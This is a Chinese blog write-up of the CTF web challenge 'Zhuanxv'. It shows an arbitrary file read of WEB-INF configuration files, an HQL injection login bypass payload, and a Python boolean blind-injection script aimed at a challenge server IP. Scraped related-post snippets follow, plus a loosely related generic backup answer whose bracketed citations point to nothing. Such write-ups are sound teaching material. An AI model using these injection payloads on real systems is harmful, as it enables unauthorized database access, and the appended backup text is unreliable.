【xctf之Zhuanxv】

最新推荐文章于 2025-08-05 17:48:31 发布
原创 最新推荐文章于 2025-08-05 17:48:31 发布 · 843 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #sql

在这里插入图片描述
打开链接地址,发现就一个这,没任何提示。那就web目录先来一波扫描。
在这里插入图片描述
发现了一个页面,先看下。
在这里插入图片描述
是个后台登陆界面,大胆猜测存在弱口令?爆破失败。
没办法了,先看看网页源码还有网络请求吧。
在这里插入图片描述
看到这个请求是请求背景图片加载,看着和正常的图片加载感觉不太一样,是不是存在任意文件读取呢?
尝试文件读取fuzz,失败。(有一说一,到这我就没思路了。。。。。我是真的菜。)
看了官方writeup,发现github搜索了下Zhuanxv,可是我找到git项目的时候啥也没有就一个没用的默认用户和密码。后来又看了几个writeup,发现
在这里插入图片描述
相信对java开发了解点的都知道这是javaweb项目的特点。
那么java项目就有一个特点了/WEB-INF/web.xml这是肯定存在的,那就先fuzz下。
在这里插入图片描述
在这里插入图片描述
下载的是个图片,将图片格式改成xml格式,发现确实可以存在任意文件读取的漏洞。
通过web.xml我们可以看到mvc模型中view层采用了struts2框架,百度下struts2框架的配置文件先。
在这里插入图片描述
我们发现struts2的配置文件为struts.xml通常放在/WEB-INF/class/struts.xml.
可以下载下来。
在这里插入图片描述
发现了配置action的类文件,这些类文件全部在/WEB-INF/class/目录下,可以下载下来,然后使用jd-gui反编译后可以查看源码。
看完反编译后的源码发现,信息不够。正常来讲,github上的项目应该给我们一个框架提示,但我看的时候是什么也没有了。正常情况下一般要不放弃了,如果熟悉java开发框架的话,都应该清楚,一般javaweb开发前端使用struts2,大概率是ssh框架整合,struts2,spring,hibernate。那先找下spring框架的配置文件还有hibernate框架的配置文件吧。
在这里插入图片描述
正常情况下ssh框架配置如上,我们发现applicationContext.xml文件在src文件夹下,这个文件我们是无权限访问的,我们只能在webroot目录下读取文件,甚至正常情况下,我们只能读取.jsp文件才对,WEB-INF目录中的文件也不可以被读取的,但谁让这个项目存在任意文件读取呢。
在这里插入图片描述
经过百度,发现applicationContext.xml文件也可以存在于WEB-INF下面。
成功下载下来了。
在这里插入图片描述
看到这就知道这个确实是ssh框架整合的javaweb项目了。
在这里插入图片描述

把上面爆露出的class文件下载下来,发现UserServiceImpl.class中过滤了=与空格。
在这里插入图片描述
这个会将name中的空格与等号使用空白符替代,并且在下面的if判断中判断通过正则匹配的password是否是只存在字母与数字,如果是就返回过滤后的name以及password。
在这里插入图片描述
hsql语句如上,好了,到这才明白这个是让我们使用sql注入的方式进行获取flag。
尝试下注入登录。
在这里插入图片描述
ok,成功登录。

payload=admin'
or
'1'>'0'
or
name
like
'admin

在这里插入图片描述
此处限制了我们必须找到一个存在账户,并且只能是一个。所以必须有个like。
那么flag大概率存在数据库中。
不要忘记,我们还有一个信息没有使用,hiberbate配置文件。
在这里插入图片描述
user.hbm.xml文件,下载这个文件同理applicationContext.xml下载地址。
在这里插入图片描述
我们可以看到,对应表格以及falg对应的cloumn。

我们只能使用盲注,而盲注一般为基于布尔型与基于时间的注入,这里最方便的就是基于布尔型注入。

import requests
s=requests.session()

flag=''
for i in range(1,50):
    p=''
    for j in range(1,255):
        payload="(select%0Aascii(substr(welcometoourctf,"+str(i)+",1))%0Afrom%0AFlag)<'"+str(j)+"'"
        url="http://61.147.171.105:56092/zhuanxvlogin?user.name=admin'%0Aor%0A"+payload+"%0Aor%0Aname%0Alike%0A'admin&user.password=1"
        r1=s.get(url)
        if len(r1.text)>20000 and p!='':
            flag+=p
            print(str(i)+":"+flag)
            break
        p=chr(j)

这也是官方writeup给的脚本,唯一不同的就是官方wirte给的 是使用id列注入,我用的就是welcometoourctf列进行注入的。

总结:总体来讲这道题,较为复杂,难点在于信息的搜集,从登陆页面发现任意文件读取,到发现web项目是ssh框架集成,再到下载/WEB-INF目录下的文件。这道题很需要细心和耐心。

参考链接

xctf官方链接:https://adworld.xctf.org.cn/challenges/write-up?hash=ab3e7454-5dc0-4157-8c3d-d77e5e1b7de0_2

【网络安全 | XCTF】Python之Django模块+curl 攻防世界 Cat 解题详析
等风来
05-30 5432
无回显,可能是因为/opt/api/是整个API项目的根目录,而/opt/api/api/是API应用程序的特定子目录,用于存放与API功能相关的文件。使用@+文件路径时,CURL将自动读取该文件内容并将其作为请求参数。这是python的Django模块,其数据库database文件存在于opt/api下的setting.py文件中。当使用文件路径作为参数时,若文件路径指定有误或不存在,则无法正确读取文件内容。flag为:WHCTF{yoooo_Such_A_G00D_@}题目描述:抓住那只猫。
XCTF 之warm up(代码审计分析)
sunleibaba的博客
01-20 769
XCTF warmup解题思路(详细讲解php代码部分): 废话不多说,进入正题: 点击创建好的环境之后,我们看到了这样一个画面: 网页是一张图片,有点懵,我们先按F12,看一下源代码: 嘿嘿,发现了一个source.php。进行查看发现一系列源代码: php源码解析: 为了便于讲解我们将代码放到notepad++上面: 第1行语句是php语言的固定开头。 第2行:对文件进行php语法高亮显示。 第3行:实例化一个叫emmm的类。 第4行和第11行语句是定义类的固定语法。 第5行:利用静态方法
攻防世界web进阶区zhuanxv
gongjingege的博客
08-10 664
SCTF 题目描述:你只是在扫描目标端口的时候发现了一个开放的web服务 打开链接是一个显示时间的页面 dirsearch扫一下 打开list页面 抓包看一下 看到JSESSIONID,得知是java web,读取配置文件web.xml 考虑了一下会不会是sql注入 看看源码,里边有个导入路径 打开url 会下载一张图片,但不能查看,notepad++看下源码 这里struts2有另一个大佬的解释 https://www.cnblogs.com/mke2fs/p/11519039.html 然后
xctf攻防世界 Web高手进阶区 Zhuanxv
l8947943的博客
01-07 1630
1.进入环境,查看内容 没有什么其他信息,尝试dirsearch一下,如图: 发现有/list页面,我们尝试一下,发现让登录,如图: 猜测是需要想办法登入,从而拿到flag 2.问题分析 对内容进行抓包 先forward,然后再通过action送入repeater,如图: 发现图片是请求加载的,也就是通过后端传说过来的,那么可以响应的url,如图: 通过/loadimage?fileName=web_login_bg.jpg拿到了图片。既然知道了服务器的地址和请求路径,我们就通过路径访问得到项目的
[wp] SCTF 2018 Zhuanxv
MercyLin的博客
09-18 1981
扫目录发现/list,点进去发现要登陆,抓包发现一个请求为 试一下有没有文件读取漏洞
攻防世界web进阶区Zhuanxv详解
hxhxhxhxx的博客
08-13 1843
攻防世界web进阶区Zhuanxv详解题目提示:详解 题目 提示: 详解 扫描目录发现了一个list 我们使用了好几个扫描工具,只有wwwscan,和webdirscan可以,(可能是我字典太菜了) 发现需要登录 查看源代码发现,这里有问题,加载图片的方式很诡异 试试文件读取 他的cookie里有jessionid 说明他是使用JAVA写的网页 那么我们尝试找找web.xml strust ...
[SCTF 2018]ZhuanXV
Sk1y的博客
12-19 969
赛题:[SCTF 2018]ZhuanXV 文章目录赛题:[SCTF 2018]ZhuanXV读取文件sql注入漏洞 读取文件 使用dirsearch工具进行扫描 发现/list,访问是个登录界面,查看源码 发现背景图片的路径 查看web.xml http://111.200.241.244:63455/loadimage?fileName=../../WEB-INF/web.xml 发现使用了strut2框架, struts.xml是struts2的核心配置文件,在开发过程中利用率最高。该文件主
XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
攻防世界 web高手进阶区 7分题 Zhuanxv
闵行小鱼塘
08-12 787
继续ctf的旅程,开始攻防世界web高手进阶区的7分题,本文是Zhuanxv的writeup
sctf2018-zhuanxv:SCTF2018-Zhuanxv Docker(源码)&Writeup
05-11
sctf2018-zhuanxv 部署 启动 ./start_up.sh 停止 docker-compose down WP 第一步:信息收集 信息收集,发现github上遗留的说明。 根据提供的url进入登录地址,发现用户名密码已经无法登陆 第二步:下载源码 查看网页源代码,发现背景图片的加载方式使用./loadimage?fileName=web_login_bg.jpg ,找到任意文件下载点,下载一系列文件。这里限制了下载文件的后缀只有class xml jpg css等。 第三步:代码审计 根据github的commit记录 了解实现类的位置。 从user.hbm.xml得知表名和类名映射 从com/cuitctf/service/impl/UserServiceImpl.class得知过滤规则,用户名只过滤空格和等号,密码限制只能字母+数字 从com/cuitctf/dao/i
攻防世界 WEB ZHUANXV
qq_41696858的博客
09-07 496
打开场景,根据提示提示,扫描目录,扫出来一个/list,提示要先登录,先抓个包看看,在第二个包出抓到了形如/loadimage?fileName=web_login_bg.jpg 再熟悉不过了,文件包含,结合cookie里的phpsession和jsessionid可以判断出,后端同时使用了java和php 那么,既然是java项目,就尝试读取一下web.xml,这个是javaweb项目最基础的一个xml文件,一般再WEB-INF目录下 构造/loadimage?fileName=…/…/WEB-INF/w
CTF 之Zhuanxv
qq_74263993的博客
04-04 1038
UserServiceImpl.class反编译后代码中是对空格进行了过滤,而sql中对回车自动过滤, 因此我们可以将空格字符换成%0A(ascii码表示换行符)。User.class反编译后是一个Bean文件,UserLoginAction.class反编译后是登录验证逻辑文件,InitApplicationContext.class反编译后是类加载器文件。其中暴露了使用的数据库,数据库账号密码,且其中包含了user.hbm.xml等配置文件,同样我们将其下载出来。很可惜进来了还是没有一点线索。
BUUCTF WEB zhuanxv
qq_41696858的博客
03-25 733
这题和攻防世界是一样的,但是由于BUUCTF靶场的设置问题,导致很多人脚本跑不出来,具体可以看这篇 https://blog.csdn.net/qq_41696858/article/details/120156854 对脚本做个简单修正 import requests import time s = requests.session() list=[6,7,8,9,10,11,12,13,15,16,17,18,20,21,22,23,25,26,27,28,30,31,32,33,34,35,36,37
【愚公系列】2023年06月 攻防世界-WebZhuanxv
时光隧道
06-18 4137
dirsearch是一个用于寻找Web服务器上隐藏目录和文件的Python脚本。它可以帮助您发现会被忽视的文件和文件夹,从而提高Web应用程序的安全性。暴力枚举目录和文件搜索常用的Web目录和文件查找隐藏的Web页面和应用程序检查Web服务器配置错误使用dirsearch需要在命令行中输入一些参数和选项。暴力枚举目录: dirsearch.py -u -e搜索常用的Web目录和文件: dirsearch.py -u -w。
XCFVXCV
xyfrihbq44的专栏
11-22 230
VVVVVVVVVVVVVVV
XCTF_Shuffle
TA不懒,但还没有添加简介
01-07 127
XCTF_Shuffle
ctf杂项各类编码汇总
bwt_D的博客
05-19 2904
ascii编码 base64编码 url编码:%61%6c%66%7b%67%79%72%63%74%70%72%67%6f%70%61%69%5f%79%5f%73%73%61%65%7d%79 shellcode编码:\x54\x68\x65\x20 Quoted-printable(针对非英文,不会考):=E6=95=8F=E6=8D=B7… uuencode(没有特点) unicode(一般不考) 莫尔斯电码(经常考 short ook: . ? ! c8 e9 ac a0 c6 f2 e
后量子时代已至?中国量子加密技术突破与网络安全新基建
最新发布
yundun_no1的博客
08-05 146
量子计算机的算力突破可能让现有的RSA、ECC等公钥加密算法在数分钟内被破解,这对金融、通信、政务等关键领域的信息安全构成致命威胁。为此,全球加速布局抗量子攻击的加密技术,中国更是在量子加密领域实现多项突破,推动网络安全新基建迈向“量子时代”。后量子时代并非遥远的未来,中国以技术突破、应用示范与制度保障的三维布局,正为数字经济构筑坚不可摧的安全防线。从“墨子号”卫星到千公里量子通话,从实验室算法到百万级用户网络,量子加密技术不仅守护当下,更在定义未来的信息安全规则。
xctf backup
06-14
### XCTF备份方法与工具 XCTF(X-Code Technology Framework)通常指的是一个竞赛平台或技术框架,其备份方法和工具主要依赖于具体的实现环境。以下是几种常见的备份方法和工具,适用于XCTF或其他类似的技术框架。 #### 1. 数据库备份 在XCTF中,如果使用了数据库来存储用户信息、题目数据等关键内容,则可以采用以下数据库备份方法: - **mysqldump**:对于MySQL数据库,`mysqldump` 是一种常用的备份工具。它能够导出完整的SQL脚本,便于恢复和迁移[^2]。 ```bash mysqldump -u username -p database_name > backup.sql ``` - **pg_dump**:对于PostgreSQL数据库,`pg_dump` 提供了类似的备份功能[^3]。 ```bash pg_dump -U username -d database_name -f backup.sql ``` #### 2. 文件系统备份 XCTF的文件系统可能包含题目文件、日志文件和其他静态资源。这些文件可以通过以下工具进行备份: - **rsync**:用于同步本地或远程文件系统,支持增量备份,减少传输量[^4]。 ```bash rsync -avz /source/directory/ user@remote:/destination/directory/ ``` - **tar**:将文件打包并压缩为单个存档文件,方便存储和传输[^5]。 ```bash tar -czvf backup.tar.gz /path/to/files ``` #### 3. 容器化备份 如果XCTF运行在Docker容器中,可以使用以下方法备份容器状态: - **docker commit**:将当前容器的状态保存为镜像[^6]。 ```bash docker commit container_id new_image_name ``` - **docker save**:将镜像保存为可移植的归档文件[^7]。 ```bash docker save -o backup.tar new_image_name ``` #### 4. 配置文件备份 XCTF的配置文件通常包括服务启动参数、API密钥等敏感信息。可以使用Git等版本控制工具进行管理,并通过加密工具保护敏感数据[^8]。 - **git**:记录配置文件的历史变更,便于回滚和协作。 ```bash git add config_files git commit -m "Backup configuration" ``` - **gpg**:对配置文件进行加密存储,确保安全性[^9]。 ```bash gpg --output config.gpg --encrypt config.json ``` #### 5. 自动化备份工具 为了简化备份流程,可以使用以下自动化工具: - **cron**:在Linux系统中设置定时任务,定期执行备份脚本[^10]。 ```bash crontab -e # 添加如下行以每天凌晨2点执行备份 0 2 * * * /path/to/backup_script.sh ``` - **Ansible**:通过编写Playbook实现跨服务器的备份任务自动化[^11]。 ### 示例代码 以下是一个简单的Python脚本,用于备份XCTF的关键文件并上传到远程服务器: ```python import os import shutil import paramiko def backup_xctf(source_dir, target_dir): if not os.path.exists(target_dir): os.makedirs(target_dir) shutil.make_archive(os.path.join(target_dir, 'xctf_backup'), 'zip', source_dir) def upload_to_remote(local_file, remote_path, ssh_host, ssh_port, ssh_user, ssh_key): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(ssh_host, port=ssh_port, username=ssh_user, key_filename=ssh_key) sftp = ssh.open_sftp() sftp.put(local_file, remote_path) sftp.close() ssh.close() # 调用示例 backup_xctf('/var/xctf', '/tmp/backups') upload_to_remote('/tmp/backups/xctf_backup.zip', '/remote/backups/xctf_backup.zip', 'example.com', 22, 'user', '/path/to/key') ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值